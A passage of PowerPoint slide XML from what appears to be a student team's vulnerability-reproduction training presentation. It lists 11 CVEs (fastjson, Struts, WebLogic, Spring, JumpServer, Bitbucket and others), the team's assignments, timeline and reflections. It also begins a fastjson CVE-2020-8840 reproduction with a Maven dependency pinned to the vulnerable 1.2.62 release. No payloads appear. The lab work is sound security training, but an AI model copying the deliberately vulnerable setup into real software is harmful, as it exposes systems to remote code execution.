                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Part 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="1219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AB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/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>项目任务改进措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255104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7595C37-A2C4-F79A-A55B-5929B5AA2BB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102767" y="418838"/>
            <a:ext cx="609721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项目任务改进措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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EBBF1A-A82D-5854-DA98-D80391D23F3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880024" y="1131450"/>
            <a:ext cx="9852145" cy="430887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r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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在编写</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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POC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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代码时，注重代码质量、可维护性和通用性，使用规范的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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POC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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代码编写规则，以确保他人便于读懂。本组成员在对齐小组内进度时，发现大家的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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POC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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代码编写的都不是很规范，需要进一步的改进。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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0" lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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我们还需要明确项目的目标和预期结果。在项目初期，我们组内分配的任务不是特别均匀，这导致有些人比较忙，但是有些人无事可做。在项目开始两天左右，我们及时调整了项目的部署与规划，将漏洞分别下发或者自主认领，成功做到了将任务分配均匀；后期的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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的制作以及项目报告的书写，也都是合作完成的。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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0" lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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于漏洞环境的话，由于我们第一次搭建漏洞环境，所以起初我们尝试时，发现较为困难。在逐渐熟悉了漏洞环境后，我们能够将漏洞环境成功地搭建出来。当然，我们也可以在网上搜索一些公开的环境，或者是使用其他人制作的一些自动化工具，这样也可以帮助我们提升我们的效率。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8699649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752398-3308-A03A-0465-670599E3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545" y="539478"/>
            <a:ext cx="724210" cy="7276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0693DB5-3F92-9358-2098-62B1518F9BF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214154" y="2049790"/>
            <a:ext cx="7763691" cy="282417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1219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rgbClr val="00AB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/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Part 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219200"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rgbClr val="339966"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>团队能力、小组个人能力及价值观情况概述</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339966"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="1219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800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="00AB7A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61826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20058307-55C1-0EA6-769B-6A0DD892E588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1029615" y="411523"/>
            <a:ext cx="609721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团队能力、小组个人能力及价值观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情况概述</a:t>
            </a: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78DD697-B3E2-06F4-7552-77704E6A4289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="895492" y="1182940"/>
            <a:ext cx="10482943" cy="42077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R="0" indent="35433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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>在这次团队的漏洞复现项目中，我们面临了不少挑战，同时也抓住了成长的机遇。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华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="35433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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>首先，明确的目标和明确的分工是我们成功的关键。项目启动之初，我们通过集体讨论，确定了研究的方向，并且清晰地分配了每个人的职责。这为项目的顺利进行打下了坚实的基础。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华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="35433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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>其次，团队的协作精神是推动项目进展的核心。在编写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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>POC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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>的过程中，我们遇到了若干技术难题。但是，通过紧密的合作和相互支持，我们克服了这些难题，找到了解决之道。我们学会了倾听团队成员的意见，发挥各自的专长，形成了一个高效协作的团队，营造了一种互相鼓励和支持的团队文化。我们建立了开放的沟通机制，鼓励团队成员分享问题和想法。通过积极的反馈，我们找到了改进的空间，并迅速做出调整，确保了项目的持续进展。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华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="35433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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>最后，我们衷心感谢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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>360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华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>团队提供的优质平台和实训指导，这不仅为我们提供了一次宝贵的实践机会，也显著提升了我们在漏洞分析和渗透测试方面的专业技能。再次表示感谢！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华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122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566582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hanks for Watching"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3268027" y="2812186"/>
            <a:ext cx="5655945" cy="55372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>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="59595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dirty="0"/>
              <a:t>Thanks for Watching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6AC4EAD-DA22-87E1-33DF-B0981FF46AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074248" y="158621"/>
            <a:ext cx="6094854" cy="7195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1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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项目任务概述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D9DEA4-E7A1-0460-0219-9FED2D4EC192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880023" y="1100030"/>
            <a:ext cx="8848367" cy="36933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本组成员在队长的带领下，一共完成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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11</a:t>
            </a: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个漏洞</a:t>
            </a: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的复现。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18DD31-E50D-5BEF-2275-306AD08028D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299410" y="1799371"/>
            <a:ext cx="9700890" cy="365638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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞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(CVE-2020-8840)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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Apache Struts S2-059 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞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CVE-2019-0230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3.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Apache APISIX Admin API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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默认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Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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漏洞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CVE-2020-13945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endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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4.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spring-messaging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞预警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(CVE-2018-1270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5.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Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞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(CVE-2022-22965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endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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未授权命令执行漏洞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CVE-2020-14882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7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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未授权命令执行漏洞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(CVE-2020-14883)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8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.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Django SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入漏洞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(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CVE-2020-7471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9.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JumpServer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远程代码执行漏洞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CVE-2024-29201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10</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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.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JumpServer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远程代码执行漏洞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CVE-2024-29202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11.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" altLang="zh-CN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Bitbucket Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="da-DK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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" altLang="zh-CN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Data Center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="da-DK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存在命令注入漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst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(CVE-2022-43781)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:effectLst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752398-3308-A03A-0465-670599E3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545" y="539478"/>
            <a:ext cx="724210" cy="7276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0693DB5-3F92-9358-2098-62B1518F9BF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214154" y="2121636"/>
            <a:ext cx="7763691" cy="2177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1219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rgbClr val="00AB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/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Part 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="1219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AB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/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>项目小组分工及安排</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="00AB7A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Calibri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989993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07C4C8F-8C6E-66E2-6CD0-C38543D7BC2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053622" y="172371"/>
            <a:ext cx="6094854" cy="7195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1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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项目小组分工及安排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41B0F2-3AAB-CC0E-2A8A-60B4EA7072D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898004" y="1018422"/>
            <a:ext cx="8122242" cy="73866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本组采用飞书云文档共享的方式，对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CVE</a:t>
            </a:r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漏洞进行管理与统计，每个人认领相应的漏洞，并及时更新完成情况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DFBDDC-0B03-4E38-F8FE-3E55D24D0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52" y="1825838"/>
            <a:ext cx="10244030" cy="4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1422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07C4C8F-8C6E-66E2-6CD0-C38543D7BC2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053622" y="172371"/>
            <a:ext cx="6094854" cy="7195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defTabSz="1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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项目小组分工及安排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DA0015-9C90-4C11-27D5-9EC9BFE9C3FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335737" y="988101"/>
            <a:ext cx="7530623" cy="20313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对应的漏洞完成情况分工：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侯博文：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CVE-2020-8840,CVE-2019-0230,CVE-2020-13945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郝志成：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CVE-2020-7471,CVE-2022-22965,CVE-2020-14882,CVE-2020-14883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陆皓喆：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CVE-2020-7471,CVE-2024-29201,CVE-2024-29202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秦德龙：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CVE-2022-43781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胡博浩：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CVE-2020-13945,CVE-2018-1270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4B58BA9-2596-CA8D-59CC-CB721B089D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547723" y="3382820"/>
            <a:ext cx="5362647" cy="23083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项目时间线总览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7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15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日：确定小组分工形式，寻找可利用漏洞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日：找出初步漏洞，了解漏洞信息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7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17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日：查阅资料，确定利用手段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18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日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-7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日：搭建漏洞环境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7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21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日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-7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23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日：本地漏洞测试以及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POC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编写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Calibri" panose="020F050202020403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24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日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-7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25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日：答辩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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制作以及漏洞复现报告</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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7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26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日：项目答辩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F691CA-2F4B-FC83-9458-BA4403408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428" y="2257234"/>
            <a:ext cx="4749958" cy="316268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E248C84-B01B-2DF3-B97B-D79F78E073A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6907888" y="5684364"/>
            <a:ext cx="4489498" cy="30777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PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>与复现报告由全组成员一起完成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177965299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B752398-3308-A03A-0465-670599E35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545" y="539478"/>
            <a:ext cx="724210" cy="72761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0693DB5-3F92-9358-2098-62B1518F9BF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214154" y="2049790"/>
            <a:ext cx="7763691" cy="21778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1219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>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="00AB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/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Part 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="12192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00AB7A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Calibri"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>项目完成情况的思考与复盘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2977504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53623" y="313822"/>
            <a:ext cx="7389107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fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞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</a:rPr>
              <a:t>(CVE-2020-8840)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204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53DA264-DCF6-E7D5-FC5B-B591D1C8654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053623" y="1073282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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞介绍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9F82FEF-7ABE-EF50-7A52-567B2FC6D13A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728345" y="1607185"/>
            <a:ext cx="8755380" cy="19234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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="914400" rtl="0" ea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59296752"/>
                </a:ext>
              </a:extLst>
            </a:pP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fastjson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是阿里巴巴的开源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JSON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解析库，它可以解析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JSON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格式的字符串，支持将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Java Bean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序列化为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JSON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字符串，也可以从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JSON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字符串反序列化到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JavaBean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。其中的组件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jackson-databind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中存在反序列化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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>gadget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。在开启了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autoType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功能的情况下，该漏洞影响</a:t>
            </a:r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fastjson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1.2.62</a:t>
            </a:r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版本，攻击者利用该漏洞可实现在目标机器上的远程代码执行。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  <a:sym typeface="Calibri" panose="020F0502020204030204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7B0B175-CB42-9615-8083-8531D1C3D20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034096" y="3263582"/>
            <a:ext cx="8867273" cy="49314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imes New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现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2DB19D-FBC5-E5AE-0BF7-20C9DB05638F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="3775780"/>
            <a:ext cx="8430102" cy="2031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idea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中创建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SpringBoot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项目，引入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fastjson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Maven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依赖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如下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&lt;dependency&gt;</a:t>
            </a:r>
            <a:b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&lt;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groupId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com.alibaba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&lt;/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groupId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b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&lt;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artifactId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fastjson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&lt;/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artifactId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b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&lt;version&gt;1.2.62&lt;/version&gt;</a:t>
            </a:r>
            <a:b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&lt;/dependency&gt;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添加一个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RestController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，包含接口调用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fastjson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8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parseObject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函数，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启动服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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Y3NTYyNzExOTIwMzU1ZDg0ZDBjYzUxMzJjZTVjZjA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70&quot;:[3312658,3317763]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3*m_i*1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231493"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="m1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="m_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_1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0001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960.75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2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  <p:tag name="KSO_WM_DIAGRAM_USE_COLOR_VALUE" val="{&quot;color_scheme&quot;:1,&quot;color_type&quot;:1,&quot;theme_color_indexes&quot;:[5,6,5,6,5,6]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3*m_h_i*1_1_1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TYPE" val="m_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_1_1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0001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960.7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8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MPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISREFERUNIT" val="0"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="m1-1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_DIAGRAM_MIN_ITEMCNT" val="1"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISNUMVISUAL" val="0"/>
  <p:tag name="KSO_WM_UNIT_ID" val="diagram20231493_3*m_h_f*1_2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231493"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="a"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="m_h_f"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_2_1"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="28"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_MAX_ITEMCNT" val="4"/>
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:416.20001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960.7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PRESET_TEXT" val="单击此处输入你的项正文，文字是您思想的提炼"/>
  <p:tag name="KSO_WM_DIAGRAM_USE_COLOR_VALUE" val="{&quot;color_scheme&quot;:1,&quot;color_type&quot;:1,&quot;theme_color_indexes&quot;:[5,6,5,6,5,6]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3*m_h_i*1_2_1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TYPE" val="m_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_2_1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0001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960.7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8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MPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISREFERUNIT" val="0"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="m1-1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_DIAGRAM_MIN_ITEMCNT" val="1"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISNUMVISUAL" val="0"/>
  <p:tag name="KSO_WM_UNIT_ID" val="diagram20231493_3*m_h_f*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231493"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="a"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="m_h_f"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_1_1"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="28"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_MAX_ITEMCNT" val="4"/>
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:416.20001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960.7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PRESET_TEXT" val="单击此处输入你的项正文，文字是您思想的提炼"/>
  <p:tag name="KSO_WM_DIAGRAM_USE_COLOR_VALUE" val="{&quot;color_scheme&quot;:1,&quot;color_type&quot;:1,&quot;theme_color_indexes&quot;:[5,6,5,6,5,6]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3*m_h_i*1_3_1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TYPE" val="m_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3_1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0001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960.75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8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COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISREFERUNIT" val="0"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="m1-1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_DIAGRAM_MIN_ITEMCNT" val="1"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISNUMVISUAL" val="0"/>
  <p:tag name="KSO_WM_UNIT_ID" val="diagram20231493_3*m_h_f*1_3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231493"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="a"/>
